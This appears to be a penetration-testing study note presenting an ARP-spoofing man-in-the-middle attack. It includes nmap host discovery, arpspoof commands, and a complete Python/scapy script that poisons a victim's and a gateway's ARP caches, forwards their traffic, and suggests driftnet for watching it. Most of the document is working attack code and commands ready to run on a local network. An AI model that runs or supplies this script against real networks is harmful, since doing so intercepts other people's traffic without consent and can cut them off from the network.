intro

# author: huangyuhui
# date: november 25,2019
# envir: 5.2.0-kali2
# desc: the detailed steps and the simple codes about the dns attack
# repo address: https://github.com/yubuntu0109/penetration-testing-learning

ARP MitM attack with the arpspoof tool

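'''
>> scan for live hosts on the target subnet
   (-sn = host discovery only, no port scan; -sP is the old, deprecated spelling)
nmap -sn 192.168.xxx.*

>> enable traffic forwarding FIRST: while both ARP caches are poisoned every
   packet between target and gateway arrives at the attacker, and if the
   kernel does not forward it the target is simply cut off (a DoS, not a MitM)
echo 1 > /proc/sys/net/ipv4/ip_forward

>> poison the target host: tell it that the gateway IP lives at the attacker's MAC
arpspoof -i wlan0 -t 192.168.xxx.xxx(targetIP) 192.168.xxx.xxx(gatewayIP)

>> poison the gateway: tell it that the target IP lives at the attacker's MAC
arpspoof -i wlan0 -t 192.168.xxx.xxx(gatewayIP) 192.168.xxx.xxx(targetIP)

>> stop with Ctrl-C: arpspoof then re-ARPs both hosts with the real addresses;
   if it is killed without that step the target stays cut off until its
   cached ARP entry expires
'''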

ARP man-in-the-middle attack with Python (scapy)

import optparse
import subprocess
import sys
import time

from scapy.all import ARP, Ether, getmacbyip, sendp


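IP_FORWARD = '/proc/sys/net/ipv4/ip_forward'


def _read_ip_forward():
    """Return the current value of the kernel's IPv4 forwarding switch ('0'/'1'), or None if it cannot be read."""
    try:
        with open(IP_FORWARD) as fh:
            return fh.read().strip()
    except (IOError, OSError):
        return None


def _write_ip_forward(value):
    """Write *value* ('0' or '1') to the kernel's IPv4 forwarding switch; return True on success.

    Writing the proc file directly replaces the original shell=True
    subprocess call.  It still requires root.
    """
    try:
        with open(IP_FORWARD, 'w') as fh:
            fh.write(value)
    except (IOError, OSError) as exc:
        print("[x]:cannot write %s=%s: %s" % (IP_FORWARD, value, exc))
        return False
    return True


def _poison_frames(victimIP, victimMAC, gatewayIP, gatewayMAC):
    """Build the two forged ARP replies that map each host's peer IP to the attacker's MAC.

    hwsrc is left at scapy's default, the sending interface's own MAC.  The
    frames are unicast to the real MAC of each host instead of broadcast, so
    the other hosts on the segment do not see (and cache) the forged mapping.
    """
    to_gateway = Ether(dst=gatewayMAC) / ARP(op=2, psrc=victimIP, pdst=gatewayIP, hwdst=gatewayMAC)
    to_victim = Ether(dst=victimMAC) / ARP(op=2, psrc=gatewayIP, pdst=victimIP, hwdst=victimMAC)
    return [to_gateway, to_victim]


def _restore_frames(victimIP, victimMAC, gatewayIP, gatewayMAC):
    """Build the ARP replies that put the real IP->MAC mappings back (what arpspoof does on exit)."""
    to_gateway = Ether(dst=gatewayMAC) / ARP(op=2, psrc=victimIP, hwsrc=victimMAC, pdst=gatewayIP, hwdst=gatewayMAC)
    to_victim = Ether(dst=victimMAC) / ARP(op=2, psrc=gatewayIP, hwsrc=gatewayMAC, pdst=victimIP, hwdst=victimMAC)
    return [to_gateway, to_victim]


def main():
    """Entry point: ARP-poison <victimIP> and <gatewayIP> and relay their traffic.

    Usage: python arpspoofing.py -v <victimIP> -g <gatewayIP>  (run as root).
    Blocks until the send loop ends (Ctrl-C); on exit both hosts are re-ARPed
    with their real MACs and ip_forward is put back to its previous value.
    Exits with status 1 on a usage error, an unresolvable host, or when
    forwarding cannot be enabled.
    """
    parser = optparse.OptionParser("usage: %prog -v <victimIP> -g <gatewayIP>")
    parser.add_option('-v', dest='victimIP', type='string', help='the specified targate ip')
    parser.add_option('-g', dest='gatewayIP', type='string', help='the specified gateway ip')
    options, _ = parser.parse_args()
    if options.victimIP is None or options.gatewayIP is None:
        print(parser.usage)
        sys.exit(1)  # non-zero so a wrapper can tell a usage error from success
    victimIP, gatewayIP = options.victimIP, options.gatewayIP

    # Resolve the real MACs up front: they are needed to unicast the forged
    # replies and to undo the poisoning on exit.  getmacbyip returns None when
    # a host does not answer ARP; at that point nothing has been poisoned yet.
    victimMAC = getmacbyip(victimIP)
    gatewayMAC = getmacbyip(gatewayIP)
    if victimMAC is None or gatewayMAC is None:
        print("[x]:could not resolve the MAC of %s or %s (same LAN? running as root?)" % (victimIP, gatewayIP))
        sys.exit(1)

    # Forwarding must be on BEFORE the caches are poisoned.  The original
    # enabled it after a never-returning send loop, so during the attack the
    # victim's traffic was black-holed at the attacker (a DoS, not a MitM).
    previous = _read_ip_forward()
    if not _write_ip_forward('1'):
        print("[x]:the traffic forwarding hasn't opened")
        sys.exit(1)
    print("[ok]:the traffic forwarding has opened")

    print('[ok]:MitM attack is running')
    try:
        # One looping sendp carrying BOTH frames: with loop=1 sendp does not
        # return, so two consecutive calls would only ever poison one side.
        sendp(_poison_frames(victimIP, victimMAC, gatewayIP, gatewayMAC), inter=1, loop=1)
    finally:
        # Reached when the loop ends (Ctrl-C) or on a send error: re-ARP both
        # hosts so the victim is not left cut off, then restore the old
        # forwarding setting.  Failures here must not mask the original error.
        print('[ok]:restoring the real ARP entries')
        try:
            sendp(_restore_frames(victimIP, victimMAC, gatewayIP, gatewayMAC), inter=1, count=3, verbose=False)
        except Exception as exc:
            print("[x]:could not restore the ARP entries: %s" % exc)
        if previous is not None and previous != '1':
            _write_ip_forward(previous)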


# run (as root):  python arpspoofing.py -v <victim ip> -g <gateway ip>
# test: watch the relayed traffic with driftnet, e.g. driftnet -v -b -i wlan0 (interface name)
if __name__ == "__main__":
    main()

moments

😅 A simple ARP-spoofing demo.